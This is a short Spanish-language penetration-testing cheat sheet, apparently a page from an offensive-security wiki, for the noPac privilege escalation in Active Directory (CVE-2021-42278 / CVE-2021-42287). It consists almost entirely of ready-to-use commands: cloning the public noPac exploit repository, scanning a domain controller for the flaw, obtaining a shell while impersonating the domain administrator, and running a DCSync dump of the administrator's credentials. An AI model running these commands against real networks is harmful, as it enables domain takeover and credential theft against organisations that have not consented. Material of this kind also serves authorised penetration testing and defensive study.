NoPac

CVE-2021-42278 / CVE-2021-42287

1) Clonación de repositorio.

git clone https://github.com/Ridter/noPac.git
cd noPac

2) Revisión si el objetivo es vulnerable.

scanner.py <ACME.LOCAL>/<user>:<password> -dc-ip <IP-address-DC> -use-ldap

3) Obtención de shell.

noPac.py <ACME.LOCAL>/<user>:<password> -dc-ip <IP-address-DC> -dc-host <hostname-DC> -shell --impersonate administrator -use-ldap

4) Realización de ataque de DCSync.

noPac.py <ACME.LOCAL>/<user>:<password> -dc-ip <IP-address-DC> -dc-host <hostname-DC> --impersonate administrator -use-ldap -dump -just-dc-user <ACME>/administrator

AnteriorDirectory Services Restore Mode (DSRM)SiguientePrintNightmare

Última actualización hace 3 años